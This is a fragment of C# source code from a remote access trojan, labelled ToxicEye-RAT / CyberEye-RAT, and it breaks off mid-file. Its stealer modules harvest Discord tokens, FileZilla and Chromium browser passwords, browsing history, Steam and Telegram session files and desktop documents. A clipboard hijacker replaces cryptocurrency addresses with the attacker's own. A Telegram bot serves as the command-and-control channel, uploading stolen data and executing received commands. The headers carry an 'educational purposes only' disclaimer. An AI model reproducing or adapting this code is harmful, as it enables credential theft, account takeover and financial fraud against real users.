hwndApp; 47 | public string szPrompt; 48 | } 49 | 50 | // Wrapper for the NULL handle or pointer. 51 | static private IntPtr NullPtr = ((IntPtr)((int)(0))); 52 | 53 | // DPAPI key initialization flags. 54 | private const int CRYPTPROTECT_UI_FORBIDDEN = 0x1; 55 | private const int CRYPTPROTECT_LOCAL_MACHINE = 0x4; 56 | 57 | 58 | private static void InitPrompt(ref CRYPTPROTECT_PROMPTSTRUCT ps) 59 | { 60 | ps.cbSize = Marshal.SizeOf( 61 | typeof(CRYPTPROTECT_PROMPTSTRUCT)); 62 | ps.dwPromptFlags = 0; 63 | ps.hwndApp = NullPtr; 64 | ps.szPrompt = null; 65 | } 66 | 67 | 68 | private static void InitBLOB(byte[] data, ref DATA_BLOB blob) 69 | { 70 | // Use empty array for null parameter. 71 | if (data == null) 72 | data = new byte[0]; 73 | 74 | // Allocate memory for the BLOB data. 75 | blob.pbData = Marshal.AllocHGlobal(data.Length); 76 | 77 | // Make sure that memory allocation was successful. 78 | if (blob.pbData == IntPtr.Zero) 79 | throw new Exception( 80 | "Unable to allocate data buffer for BLOB structure."); 81 | 82 | // Specify number of bytes in the BLOB. 83 | blob.cbData = data.Length; 84 | 85 | // Copy data from original source to the BLOB structure. 86 | Marshal.Copy(data, 0, blob.pbData, data.Length); 87 | } 88 | 89 | 90 | 91 | public static string Decrypt(string cipherText) 92 | { 93 | string description; 94 | 95 | return Decrypt(cipherText, String.Empty, out description); 96 | } 97 | 98 | 99 | public static string Decrypt(string cipherText, 100 | out string description) 101 | { 102 | return Decrypt(cipherText, String.Empty, out description); 103 | } 104 | 105 | public static string Decrypt(string cipherText, 106 | string entropy, 107 | out string description) 108 | { 109 | // Make sure that parameters are valid. 110 | if (entropy == null) entropy = String.Empty; 111 | 112 | return Encoding.UTF8.GetString( 113 | Decrypt(Convert.FromBase64String(cipherText), 114 | Encoding.UTF8.GetBytes(entropy), 115 | out description)); 116 | } 117 | 118 | 119 | public static byte[] Decrypt(byte[] cipherTextBytes, 120 | byte[] entropyBytes, 121 | out string description) 122 | { 123 | // Create BLOBs to hold data. 124 | DATA_BLOB plainTextBlob = new DATA_BLOB(); 125 | DATA_BLOB cipherTextBlob = new DATA_BLOB(); 126 | DATA_BLOB entropyBlob = new DATA_BLOB(); 127 | 128 | // We only need prompt structure because it is a required 129 | // parameter. 130 | CRYPTPROTECT_PROMPTSTRUCT prompt = 131 | new CRYPTPROTECT_PROMPTSTRUCT(); 132 | InitPrompt(ref prompt); 133 | 134 | // Initialize description string. 135 | description = String.Empty; 136 | 137 | try 138 | { 139 | // Convert ciphertext bytes into a BLOB structure. 140 | try 141 | { 142 | InitBLOB(cipherTextBytes, ref cipherTextBlob); 143 | } 144 | catch (Exception ex) 145 | { 146 | throw new Exception( 147 | "Cannot initialize ciphertext BLOB.", ex); 148 | } 149 | 150 | // Convert entropy bytes into a BLOB structure. 151 | try 152 | { 153 | InitBLOB(entropyBytes, ref entropyBlob); 154 | } 155 | catch (Exception ex) 156 | { 157 | throw new Exception( 158 | "Cannot initialize entropy BLOB.", ex); 159 | } 160 | 161 | // Disable any types of UI. CryptUnprotectData does not 162 | // mention CRYPTPROTECT_LOCAL_MACHINE flag in the list of 163 | // supported flags so we will not set it up. 164 | int flags = CRYPTPROTECT_UI_FORBIDDEN; 165 | 166 | // Call DPAPI to decrypt data. 167 | bool success = CryptUnprotectData(ref cipherTextBlob, 168 | ref description, 169 | ref entropyBlob, 170 | IntPtr.Zero, 171 | ref prompt, 172 | flags, 173 | ref plainTextBlob); 174 | 175 | // Check the result. 176 | if (!success) 177 | { 178 | // If operation failed, retrieve last Win32 error. 179 | int errCode = Marshal.GetLastWin32Error(); 180 | 181 | // Win32Exception will contain error message corresponding 182 | // to the Windows error code. 183 | throw new Exception( 184 | "CryptUnprotectData failed.", new Win32Exception(errCode)); 185 | } 186 | 187 | // Allocate memory to hold plaintext. 188 | byte[] plainTextBytes = new byte[plainTextBlob.cbData]; 189 | 190 | // Copy ciphertext from the BLOB to a byte array. 191 | Marshal.Copy(plainTextBlob.pbData, 192 | plainTextBytes, 193 | 0, 194 | plainTextBlob.cbData); 195 | 196 | // Return the result. 197 | return plainTextBytes; 198 | } 199 | catch (Exception ex) 200 | { 201 | throw new Exception("DPAPI was unable to decrypt data.", ex); 202 | } 203 | // Free all memory allocated for BLOBs. 204 | finally 205 | { 206 | if (plainTextBlob.pbData != IntPtr.Zero) 207 | Marshal.FreeHGlobal(plainTextBlob.pbData); 208 | 209 | if (cipherTextBlob.pbData != IntPtr.Zero) 210 | Marshal.FreeHGlobal(cipherTextBlob.pbData); 211 | 212 | if (entropyBlob.pbData != IntPtr.Zero) 213 | Marshal.FreeHGlobal(entropyBlob.pbData); 214 | } 215 | } 216 | } 217 | } -------------------------------------------------------------------------------- /TelegramRAT/core/stealer/Discord.cs: -------------------------------------------------------------------------------- 1 | // Author : NYAN CAT 2 | // Name : Discord Token Grabber 3 | // Contact : https://github.com/NYAN-x-CAT 4 | 5 | using System; 6 | using System.Collections.Generic; 7 | using System.IO; 8 | using System.Text.RegularExpressions; 9 | 10 | namespace TelegramRAT 11 | { 12 | internal class DiscordGrabber 13 | { 14 | 15 | // Get token 16 | public static void get() 17 | { 18 | var files = SearchForFile(); 19 | if (files.Count == 0) 20 | { 21 | telegram.sendText("⛔ Didn't find any ldb files"); 22 | return; 23 | } 24 | foreach (string token in files) 25 | { 26 | foreach (Match match in Regex.Matches(token, "[^\"]*")) 27 | { 28 | if (match.Length == 59) 29 | { 30 | telegram.sendText($"💎 Discord token: {match.ToString()}"); 31 | } 32 | } 33 | } 34 | } 35 | 36 | // Locate *.ldb files 37 | private static List SearchForFile() 38 | { 39 | List ldbFiles = new List(); 40 | string discordPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\discord\\Local Storage\\leveldb\\"; 41 | 42 | if (!Directory.Exists(discordPath)) 43 | { 44 | telegram.sendText("🛠 Discord path not found"); 45 | return ldbFiles; 46 | } 47 | 48 | foreach (string file in Directory.GetFiles(discordPath, "*.ldb", SearchOption.TopDirectoryOnly)) 49 | { 50 | string rawText = File.ReadAllText(file); 51 | if (rawText.Contains("oken")) 52 | { 53 | ldbFiles.Add(rawText); 54 | } 55 | } 56 | return ldbFiles; 57 | } 58 | 59 | 60 | } 61 | } 62 | -------------------------------------------------------------------------------- /TelegramRAT/core/stealer/FileZilla.cs: -------------------------------------------------------------------------------- 1 | /* 2 | ^ Author : LimerBoy 3 | ^ Name : ToxicEye-RAT 4 | ^ Github : https://github.com/LimerBoy 5 | 6 | > This program is distributed for educational purposes only. 7 | */ 8 | 9 | using System; 10 | using System.IO; 11 | using System.Xml; 12 | using System.Text; 13 | 14 | namespace TelegramRAT 15 | { 16 | internal class FileZilla 17 | { 18 | public static void get() 19 | { 20 | // Path info 21 | string FileZillaPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\FileZilla\\"; 22 | string SiteManagerPath = FileZillaPath + "sitemanager.xml"; 23 | string RecentServersPath = FileZillaPath + "recentservers.xml"; 24 | 25 | // Database 26 | string filename = "filezilla.txt"; 27 | string output = "[FILEZILLA SERVERS]\n\n"; 28 | 29 | // If not installed 30 | if (!Directory.Exists(FileZillaPath)) 31 | { 32 | telegram.sendText("🛠 FileZilla not installed"); 33 | return; 34 | } 35 | 36 | // Get data from recentserver.xml 37 | if (File.Exists(RecentServersPath)) 38 | { 39 | try 40 | { 41 | XmlDocument doc = new XmlDocument(); 42 | doc.Load(RecentServersPath); 43 | foreach (XmlNode node in doc.GetElementsByTagName("Server")) 44 | { 45 | // Get values 46 | string url = "ftp://" + node["Host"].InnerText + ":" + node["Port"].InnerText + "/"; 47 | string username = node["User"].InnerText; 48 | string password = Encoding.UTF8.GetString(Convert.FromBase64String(node["Pass"].InnerText)); 49 | // Add 50 | output += "URL: " + url + "\n" 51 | + "USERNAME: " + username + "\n" 52 | + "PASSWORD: " + password + "\n" 53 | + "\n"; 54 | } 55 | } catch { 56 | telegram.sendText("⛔ Failed to read recentserver.xml"); 57 | } 58 | } 59 | // Get data from sitemanager.xml 60 | if (File.Exists(SiteManagerPath)) 61 | { 62 | try 63 | { 64 | XmlDocument doc = new XmlDocument(); 65 | doc.Load(SiteManagerPath); 66 | foreach (XmlNode node in doc.GetElementsByTagName("Server")) 67 | { 68 | // Get values 69 | string url = "ftp://" + node["Host"].InnerText + ":" + node["Port"].InnerText + "/"; 70 | string username = node["User"].InnerText; 71 | string password = Encoding.UTF8.GetString(Convert.FromBase64String(node["Pass"].InnerText)); 72 | // Add 73 | output += "URL: " + url + "\n" 74 | + "USERNAME: " + username + "\n" 75 | + "PASSWORD: " + password + "\n" 76 | + "\n"; 77 | } 78 | } catch 79 | { 80 | telegram.sendText("⛔ Failed to read sitemanager.xml"); 81 | } 82 | 83 | } 84 | // Send 85 | File.WriteAllText(filename, output); 86 | telegram.UploadFile(filename, true); 87 | } 88 | } 89 | } 90 | -------------------------------------------------------------------------------- /TelegramRAT/core/stealer/GrabDesktop.cs: -------------------------------------------------------------------------------- 1 | /* 2 | ^ Author : LimerBoy 3 | ^ Name : ToxicEye-RAT 4 | ^ Github : https://github.com/LimerBoy 5 | 6 | > This program is distributed for educational purposes only. 7 | */ 8 | 9 | using System; 10 | using System.Linq; 11 | using System.IO; 12 | using System.IO.Compression; 13 | 14 | namespace TelegramRAT 15 | { 16 | internal class GrabDesktop 17 | { 18 | public static void get() 19 | { 20 | // Info 21 | telegram.sendText("📦 Archiving desktop files..."); 22 | // Find files on desktop 23 | string archivePath = Path.GetDirectoryName(config.InstallPath) + "\\desktop.zip"; 24 | string desktopPath = Environment.GetFolderPath(Environment.SpecialFolder.Desktop); 25 | // Find files 26 | var files = utils.GetFiles(desktopPath, "*.*", SearchOption.AllDirectories); 27 | // Write data 28 | using (var archive = ZipFile.Open(archivePath, ZipArchiveMode.Create)) 29 | { 30 | foreach (var file in files) 31 | { 32 | // If file not from list 33 | if (!config.GrabFileTypes.Contains(Path.GetExtension(file).ToLower())) 34 | continue; 35 | // If the file size is larger than specified 36 | if (config.GrabFileSize <= new FileInfo(file).Length) 37 | continue; 38 | 39 | // Archive file 40 | archive.CreateEntryFromFile(file, Path.GetFullPath(file)); 41 | } 42 | } 43 | // Send document 44 | telegram.sendFile(archivePath); 45 | // Delete archive 46 | File.Delete(archivePath); 47 | } 48 | } 49 | } 50 | -------------------------------------------------------------------------------- /TelegramRAT/core/stealer/History.cs: -------------------------------------------------------------------------------- 1 | /* 2 | ^ Author : LimerBoy 3 | ^ Name : ToxicEye-RAT 4 | ^ Github : https://github.com/LimerBoy 5 | 6 | > This program is distributed for educational purposes only. 7 | */ 8 | 9 | using System; 10 | using System.IO; 11 | 12 | namespace TelegramRAT 13 | { 14 | internal class History 15 | { 16 | 17 | public static void get() 18 | { 19 | // loadDlls 20 | AutoStealer.loadDlls(); 21 | // Path info 22 | string a_a = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\"; 23 | string l_a = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\"; 24 | string u_s = "\\User Data\\Default\\History"; 25 | // Browsers list 26 | string[] chromiumBasedBrowsers = new string[] 27 | { 28 | l_a + "Google\\Chrome" + u_s, 29 | l_a + "Google(x86)\\Chrome" + u_s, 30 | l_a + "Chromium" + u_s, 31 | a_a + "Opera Software\\Opera Stable\\History", 32 | l_a + "BraveSoftware\\Brave-Browser" + u_s, 33 | l_a + "Epic Privacy Browser" + u_s, 34 | l_a + "Amigo" + u_s, 35 | l_a + "Vivaldi" + u_s, 36 | l_a + "Orbitum" + u_s, 37 | l_a + "Mail.Ru\\Atom" + u_s, 38 | l_a + "Kometa" + u_s, 39 | l_a + "Comodo\\Dragon" + u_s, 40 | l_a + "Torch" + u_s, 41 | l_a + "Comodo" + u_s, 42 | l_a + "Slimjet" + u_s, 43 | l_a + "360Browser\\Browser" + u_s, 44 | l_a + "Maxthon3" + u_s, 45 | l_a + "K-Melon" + u_s, 46 | l_a + "Sputnik\\Sputnik" + u_s, 47 | l_a + "Nichrome" + u_s, 48 | l_a + "CocCoc\\Browser" + u_s, 49 | l_a + "uCozMedia\\Uran" + u_s, 50 | l_a + "Chromodo" + u_s, 51 | l_a + "Yandex\\YandexBrowser" + u_s 52 | }; 53 | 54 | // Database 55 | string tempHistoryLocation = ""; 56 | string filename = "history.txt"; 57 | string output = "[HISTORY]\n\n"; 58 | 59 | // Search all browsers 60 | foreach (string browser in chromiumBasedBrowsers) 61 | { 62 | if (File.Exists(browser)) 63 | { 64 | tempHistoryLocation = Environment.GetEnvironmentVariable("temp") + "\\browserHistory"; 65 | if (File.Exists(tempHistoryLocation)) 66 | { 67 | File.Delete(tempHistoryLocation); 68 | } 69 | File.Copy(browser, tempHistoryLocation); 70 | } else { 71 | continue; 72 | } 73 | 74 | // Read chrome database 75 | cSQLite sSQLite = new cSQLite(tempHistoryLocation); 76 | sSQLite.ReadTable("urls"); 77 | 78 | for (int i = 0; i < sSQLite.GetRowCount(); i++) 79 | { 80 | // Get data from database 81 | string url = Convert.ToString(sSQLite.GetValue(i, 1)); 82 | string title = Convert.ToString(sSQLite.GetValue(i, 2)); 83 | string visits = Convert.ToString(Convert.ToInt32(sSQLite.GetValue(i, 3)) + 1); 84 | string time = Convert.ToString(TimeZoneInfo.ConvertTimeFromUtc(DateTime.FromFileTimeUtc(10 * Convert.ToInt64(sSQLite.GetValue(i, 5))), TimeZoneInfo.Local)); 85 | 86 | 87 | // If no data => break 88 | if (string.IsNullOrEmpty(url)) 89 | { 90 | break; 91 | } 92 | // Add 93 | output += "URL: " + url + "\n" 94 | + "TITLE: " + Crypt.toUTF8(title) + "\n" 95 | + "VISITS: " + visits + "\n" 96 | + "DATE: " + time + "\n" 97 | + "\n"; 98 | continue; 99 | } 100 | continue; 101 | } 102 | // Send 103 | File.WriteAllText(filename, output); 104 | telegram.UploadFile(filename, true); 105 | } 106 | } 107 | } -------------------------------------------------------------------------------- /TelegramRAT/core/stealer/Passwords.cs: -------------------------------------------------------------------------------- 1 | /* 2 | ^ Author : LimerBoy 3 | ^ Name : ToxicEye-RAT 4 | ^ Github : https://github.com/LimerBoy 5 | 6 | > This program is distributed for educational purposes only. 7 | */ 8 | 9 | using System; 10 | using System.IO; 11 | 12 | namespace TelegramRAT 13 | { 14 | internal class Passwords 15 | { 16 | 17 | public static void get() 18 | { 19 | // loadDlls 20 | AutoStealer.loadDlls(); 21 | // Path info 22 | string a_a = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\"; 23 | string l_a = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\"; 24 | string u_s = "\\User Data\\Default\\Login Data"; 25 | // Browsers list 26 | string[] chromiumBasedBrowsers = new string[] 27 | { 28 | l_a + "Google\\Chrome" + u_s, 29 | l_a + "Google(x86)\\Chrome" + u_s, 30 | l_a + "Chromium" + u_s, 31 | a_a + "Opera Software\\Opera Stable\\Login Data", 32 | l_a + "BraveSoftware\\Brave-Browser" + u_s, 33 | l_a + "Epic Privacy Browser" + u_s, 34 | l_a + "Amigo" + u_s, 35 | l_a + "Vivaldi" + u_s, 36 | l_a + "Orbitum" + u_s, 37 | l_a + "Mail.Ru\\Atom" + u_s, 38 | l_a + "Kometa" + u_s, 39 | l_a + "Comodo\\Dragon" + u_s, 40 | l_a + "Torch" + u_s, 41 | l_a + "Comodo" + u_s, 42 | l_a + "Slimjet" + u_s, 43 | l_a + "360Browser\\Browser" + u_s, 44 | l_a + "Maxthon3" + u_s, 45 | l_a + "K-Melon" + u_s, 46 | l_a + "Sputnik\\Sputnik" + u_s, 47 | l_a + "Nichrome" + u_s, 48 | l_a + "CocCoc\\Browser" + u_s, 49 | l_a + "uCozMedia\\Uran" + u_s, 50 | l_a + "Chromodo" + u_s, 51 | l_a + "Yandex\\YandexBrowser" + u_s 52 | }; 53 | 54 | // Database 55 | string tempDatabaseLocation = ""; 56 | string filename = "passwords.txt"; 57 | string output = "[PASSWORDS]\n\n"; 58 | 59 | // Search all browsers 60 | foreach (string browser in chromiumBasedBrowsers) 61 | { 62 | if (File.Exists(browser)) 63 | { 64 | tempDatabaseLocation = Environment.GetEnvironmentVariable("temp") + "\\browserPasswords"; 65 | if (File.Exists(tempDatabaseLocation)) 66 | { 67 | File.Delete(tempDatabaseLocation); 68 | } 69 | File.Copy(browser, tempDatabaseLocation); 70 | } else { 71 | continue; 72 | } 73 | 74 | // Read chrome database 75 | cSQLite sSQLite = new cSQLite(tempDatabaseLocation); 76 | sSQLite.ReadTable("logins"); 77 | 78 | for (int i = 0; i < sSQLite.GetRowCount(); i++) 79 | { 80 | // Get data from database 81 | string hostname = sSQLite.GetValue(i, 0); 82 | string username = sSQLite.GetValue(i, 3); 83 | string password = sSQLite.GetValue(i, 5); 84 | 85 | // If no data => break 86 | if (string.IsNullOrEmpty(password)) 87 | { 88 | break; 89 | } 90 | 91 | // Add 92 | output += "HOSTNAME: " + hostname + "\n" 93 | + "USERNAME: " + Crypt.toUTF8(username) + "\n" 94 | + "PASSWORD: " + Crypt.toUTF8(Crypt.decryptChrome(password, browser)) + "\n" 95 | + "\n"; 96 | 97 | continue; 98 | } 99 | continue; 100 | } 101 | // Send 102 | File.WriteAllText(filename, output); 103 | telegram.UploadFile(filename, true); 104 | } 105 | } 106 | } 107 | -------------------------------------------------------------------------------- /TelegramRAT/core/stealer/Steam.cs: -------------------------------------------------------------------------------- 1 | /* 2 | ^ Author : LimerBoy 3 | ^ Name : ToxicEye-RAT 4 | ^ Github : https://github.com/LimerBoy 5 | 6 | > This program is distributed for educational purposes only. 7 | */ 8 | 9 | using System; 10 | using System.IO; 11 | using System.Linq; 12 | using System.Diagnostics; 13 | using System.IO.Compression; 14 | 15 | namespace TelegramRAT 16 | { 17 | class SteamGrabber 18 | { 19 | 20 | public static void get() 21 | { 22 | 23 | string steamPath; 24 | // Try get Stean path by process 25 | Process[] process = Process.GetProcessesByName("Steam"); 26 | if (process.Length > 0) 27 | { 28 | // Locate steam path 29 | steamPath = Path.GetDirectoryName(process[0].MainModule.FileName) + "\\"; 30 | string archivePath = Path.GetDirectoryName(config.InstallPath) + "\\steam.zip"; 31 | // Check 32 | Console.WriteLine(steamPath); 33 | string[] a = Directory.GetFiles(steamPath, "ssfn*"); 34 | string[] b = Directory.GetFiles(steamPath, "config\\loginusers.*"); 35 | string[] c = Directory.GetFiles(steamPath, "config\\config.*"); 36 | // Concat 37 | var files = a.Concat(b).Concat(c); 38 | // Write data 39 | using (var archive = ZipFile.Open(archivePath, ZipArchiveMode.Create)) 40 | { 41 | foreach (var file in files) 42 | { 43 | // Archive file 44 | archive.CreateEntryFromFile(file, file); 45 | } 46 | } 47 | // Send 48 | telegram.sendFile(archivePath); 49 | // Delete 50 | File.Delete(archivePath); 51 | } else 52 | { 53 | telegram.sendText("🛠 Steam process not running.."); 54 | } 55 | } 56 | 57 | 58 | 59 | } 60 | } 61 | -------------------------------------------------------------------------------- /TelegramRAT/core/stealer/Telegram.cs: -------------------------------------------------------------------------------- 1 | /* 2 | ^ Author : LimerBoy 3 | ^ Name : ToxicEye-RAT 4 | ^ Github : https://github.com/LimerBoy 5 | 6 | > This program is distributed for educational purposes only. 7 | */ 8 | 9 | using System; 10 | using System.IO; 11 | using System.Diagnostics; 12 | using System.IO.Compression; 13 | 14 | namespace TelegramRAT 15 | { 16 | internal class TelegramGrabber 17 | { 18 | 19 | private static bool in_folder = false; 20 | 21 | public static void get() 22 | { 23 | string tdataPath; 24 | // Try get Telegram path by process 25 | Process[] process = Process.GetProcessesByName("Telegram"); 26 | if (process.Length > 0) 27 | { 28 | // Locate tdata 29 | tdataPath = Path.GetDirectoryName(process[0].MainModule.FileName) + "\\tdata\\"; 30 | telegram.sendText("⚡️ Telegram session found by process. Please wait..."); 31 | // Steal 32 | steal(tdataPath); 33 | // Try get Telegram default path 34 | } else 35 | { 36 | // Try to find tdata in Telegram default path 37 | tdataPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Telegram Desktop\\tdata\\"; 38 | if (Directory.Exists(tdataPath)) 39 | { 40 | telegram.sendText("⚡️ Telegram session found in default path. Please wait..."); 41 | steal(tdataPath); 42 | } 43 | // tdata not found 44 | else 45 | { 46 | telegram.sendText("🛠 Telegram default path and process not found"); 47 | } 48 | } 49 | } 50 | 51 | private static void steal(string tdata) 52 | { 53 | // Paths 54 | string dirPath = Path.GetDirectoryName(config.InstallPath) + "\\tdata"; 55 | string archivePath = dirPath + ".zip"; 56 | // If not exists 57 | if (!Directory.Exists(tdata)) 58 | { 59 | telegram.sendText("🛠 tdata directory not found"); 60 | return; 61 | } 62 | // Create dir 63 | Directory.CreateDirectory(dirPath); 64 | // Copy all tdata to dir 65 | CopyAll(tdata, dirPath); 66 | // Add dir to archive 67 | ZipFile.CreateFromDirectory(dirPath, archivePath); 68 | // Send tdata 69 | telegram.sendFile(archivePath); 70 | // Remove archive & dir 71 | File.Delete(archivePath); 72 | Directory.Delete(dirPath, true); 73 | } 74 | 75 | private static void CopyAll(string fromDir, string toDir) 76 | { 77 | foreach (string s1 in Directory.GetFiles(fromDir)) 78 | CopyFile(s1, toDir); 79 | foreach (string s in Directory.GetDirectories(fromDir)) 80 | CopyDir(s, toDir); 81 | } 82 | 83 | private static void CopyFile(string s1, string toDir) 84 | { 85 | try 86 | { 87 | var fname = Path.GetFileName(s1); 88 | if (in_folder && !(fname[0] == 'm' || fname[1] == 'a' || fname[2] == 'p')) 89 | return; 90 | var s2 = toDir + "\\" + fname; 91 | File.Copy(s1, s2); 92 | } 93 | catch { } 94 | } 95 | 96 | 97 | private static void CopyDir(string s, string toDir) 98 | { 99 | try 100 | { 101 | in_folder = true; 102 | CopyAll(s, toDir + "\\" + Path.GetFileName(s)); 103 | in_folder = false; 104 | } 105 | catch { } 106 | } 107 | 108 | 109 | } 110 | } 111 | -------------------------------------------------------------------------------- /TelegramRAT/core/stealer/clipper.cs: -------------------------------------------------------------------------------- 1 | // Author : NYAN CAT 2 | // Name : Bitcoin Address Grabber v0.3.5 3 | // Contact : https://github.com/NYAN-x-CAT 4 | 5 | using System; 6 | using System.Windows.Forms; 7 | using System.Runtime.InteropServices; 8 | using System.Threading; 9 | using System.Text.RegularExpressions; 10 | 11 | namespace TelegramRAT 12 | { 13 | 14 | internal static class Clipper 15 | { 16 | // Run 17 | public static void Run() 18 | { 19 | // If disabled 20 | if (!config.ClipperEnabled) 21 | return; 22 | // Run 23 | Console.WriteLine("[+] Clipper is starting..."); 24 | new Thread(() => { Application.Run(new ClipboardNotification.NotificationForm()); }).Start(); 25 | } 26 | } 27 | 28 | // Patterns 29 | internal static class PatternRegex 30 | { 31 | public readonly static Regex btc = new Regex(@"\b(bc1|[13])[a-zA-HJ-NP-Z0-9]{26,35}\b"); 32 | public readonly static Regex eth = new Regex(@"\b0x[a-fA-F0-9]{40}\b"); 33 | public readonly static Regex xmr = new Regex(@"\b4([0-9]|[A-B])(.){93}\b"); 34 | } 35 | 36 | // Clipboard 37 | internal static class Clipboard 38 | { 39 | // Get 40 | public static string GetText() 41 | { 42 | string ReturnValue = string.Empty; 43 | Thread STAThread = new Thread( 44 | delegate () 45 | { 46 | ReturnValue = System.Windows.Forms.Clipboard.GetText(); 47 | }); 48 | STAThread.SetApartmentState(ApartmentState.STA); 49 | STAThread.Start(); 50 | STAThread.Join(); 51 | 52 | return ReturnValue; 53 | } 54 | // Set 55 | public static void SetText(string txt) 56 | { 57 | Thread STAThread = new Thread( 58 | delegate () 59 | { 60 | System.Windows.Forms.Clipboard.SetText(txt); 61 | }); 62 | STAThread.SetApartmentState(ApartmentState.STA); 63 | STAThread.Start(); 64 | STAThread.Join(); 65 | } 66 | } 67 | 68 | // Methods 69 | internal static class NativeMethods 70 | { 71 | public const int WM_CLIPBOARDUPDATE = 0x031D; 72 | public static IntPtr HWND_MESSAGE = new IntPtr(-3); 73 | 74 | [DllImport("user32.dll", SetLastError = true)] 75 | [return: MarshalAs(UnmanagedType.Bool)] 76 | public static extern bool AddClipboardFormatListener(IntPtr hwnd); 77 | 78 | [DllImport("user32.dll", SetLastError = true)] 79 | public static extern IntPtr SetParent(IntPtr hWndChild, IntPtr hWndNewParent); 80 | } 81 | 82 | public sealed class ClipboardNotification 83 | { 84 | public class NotificationForm : Form 85 | { 86 | private static string currentClipboard = Clipboard.GetText(); 87 | public NotificationForm() 88 | { 89 | NativeMethods.SetParent(Handle, NativeMethods.HWND_MESSAGE); 90 | NativeMethods.AddClipboardFormatListener(Handle); 91 | } 92 | 93 | private bool RegexResult(Regex pattern) 94 | { 95 | if (pattern.Match(currentClipboard).Success) return true; 96 | else 97 | return false; 98 | } 99 | 100 | protected override void WndProc(ref Message m) 101 | { 102 | if (m.Msg == NativeMethods.WM_CLIPBOARDUPDATE) 103 | { 104 | currentClipboard = Clipboard.GetText(); 105 | 106 | if (RegexResult(PatternRegex.btc) && !currentClipboard.Contains(config.bitcoin_address) && !string.IsNullOrEmpty(config.bitcoin_address)) 107 | { 108 | string result = PatternRegex.btc.Replace(currentClipboard, config.bitcoin_address); 109 | Clipboard.SetText(result); 110 | telegram.sendText($"💸 Replaced bitcoin address \"{currentClipboard}\" to \"{config.bitcoin_address}\""); 111 | } 112 | 113 | if (RegexResult(PatternRegex.eth) && !currentClipboard.Contains(config.etherium_address) && !string.IsNullOrEmpty(config.etherium_address)) 114 | { 115 | string result = PatternRegex.eth.Replace(currentClipboard, config.etherium_address); 116 | Clipboard.SetText(result); 117 | telegram.sendText($"💸 Replaced etherium address \"{currentClipboard}\" to \"{config.etherium_address}\""); 118 | } 119 | 120 | if (RegexResult(PatternRegex.xmr) && !currentClipboard.Contains(config.monero_address) && !string.IsNullOrEmpty(config.monero_address)) 121 | { 122 | string result = PatternRegex.xmr.Replace(currentClipboard, config.monero_address); 123 | Clipboard.SetText(result); 124 | telegram.sendText($"💸 Replaced monero address \"{currentClipboard}\" to \"{config.monero_address}\""); 125 | } 126 | 127 | } 128 | base.WndProc(ref m); 129 | } 130 | } 131 | 132 | } 133 | } 134 | -------------------------------------------------------------------------------- /TelegramRAT/core/telegram.cs: -------------------------------------------------------------------------------- 1 | /* 2 | * Original Version 3 | 4 | ^ Author : LimerBoy 5 | ^ Name : ToxicEye-RAT 6 | ^ Github : https://github.com/LimerBoy 7 | 8 | * Modded Version 9 | 10 | ^ Author : Cisamu 11 | ^ Name : CyberEye-RAT 12 | ^ Github : https://github.com/cisamu123 13 | > This program is distributed for educational purposes only. 14 | */ 15 | 16 | using System; 17 | using System.IO; 18 | using System.Net; 19 | using System.Net.Http; 20 | using System.Threading; 21 | using SimpleJSON; 22 | 23 | namespace TelegramRAT 24 | { 25 | internal class telegram 26 | { 27 | // Thread 28 | public static Thread waitCommandsThread = new Thread(waitCommands); 29 | // Thread is blocked 30 | public static bool waitThreadIsBlocked = false; 31 | 32 | 33 | // If is blocked - wait 34 | private static void waitForUnblock() 35 | { 36 | while (true) 37 | { 38 | // If detected bad process 39 | if (waitThreadIsBlocked) 40 | { 41 | Thread.Sleep(200); 42 | continue; 43 | } else 44 | { 45 | break; 46 | } 47 | } 48 | } 49 | 50 | 51 | // Wait commands 52 | private static void waitCommands() 53 | { 54 | waitForUnblock(); 55 | // Get last update id 56 | int LastUpdateID = 0; 57 | string response; 58 | using (WebClient client = new WebClient()) 59 | response = client.DownloadString($"https://api.telegram.org/bot{config.TelegramToken}/getUpdates"); 60 | LastUpdateID = JSON.Parse(response)["result"][0]["update_id"].AsInt; 61 | 62 | // Get commands 63 | while (true) 64 | { 65 | // Sleep 66 | Thread.Sleep(config.TelegramCommandCheckDelay * 1000); 67 | // 68 | waitForUnblock(); 69 | // Get commands 70 | LastUpdateID++; 71 | using (WebClient client = new WebClient()) 72 | response = client.DownloadString($"https://api.telegram.org/bot{config.TelegramToken}/getUpdates?offset={LastUpdateID}"); 73 | var json = JSON.Parse(response); 74 | 75 | foreach (JSONNode r in json["result"].AsArray) 76 | { 77 | JSONNode message = r["message"]; 78 | string chatid = message["chat"]["id"]; 79 | LastUpdateID = r["update_id"].AsInt; 80 | 81 | // If not the creator of the bot writes 82 | if (chatid != config.TelegramChatID) 83 | { 84 | string username = message["chat"]["username"]; 85 | string firstname = message["chat"]["first_name"]; 86 | sendText($"👑 You not my owner {firstname}", chatid); 87 | sendText($"👑 Unknown user with id {chatid} and username @{username} send command to bot!"); 88 | break; 89 | } 90 | // Download file from chat to computer 91 | if (message.HasKey("document")) 92 | { 93 | // Get document info 94 | string fileName = message["document"]["file_name"]; 95 | string fileID = message["document"]["file_id"]; 96 | JSONNode filePath; 97 | // Get file path 98 | using (WebClient client = new WebClient()) 99 | { 100 | filePath = JSON.Parse(client.DownloadString( 101 | "https://api.telegram.org/bot" + 102 | config.TelegramToken + 103 | "/getFile" + 104 | "?file_id=" + fileID 105 | ))["result"]["file_path"]; 106 | } 107 | // Download 108 | DownloadFile(fileName, filePath); 109 | } 110 | // Run command 111 | else if (message.HasKey("text")) 112 | { 113 | string command = message["text"]; 114 | // Check if it's command 115 | if (!command.StartsWith("/")) { continue; } 116 | // Execute command in new thread 117 | Thread t = new Thread(() => commands.handle(command)); 118 | t.SetApartmentState(ApartmentState.STA); 119 | t.Start(); 120 | } 121 | else 122 | { 123 | sendText("🍩 Unknown type received. Only Text/Document can be used!"); 124 | } 125 | } 126 | } 127 | } 128 | 129 | public static void sendFile(string file, string type = "Document") 130 | { 131 | waitForUnblock(); 132 | // If is file 133 | if (!File.Exists(file)) 134 | { 135 | sendText("⛔ File not found!"); 136 | return; 137 | } 138 | // Send file 139 | using (HttpClient httpClient = new 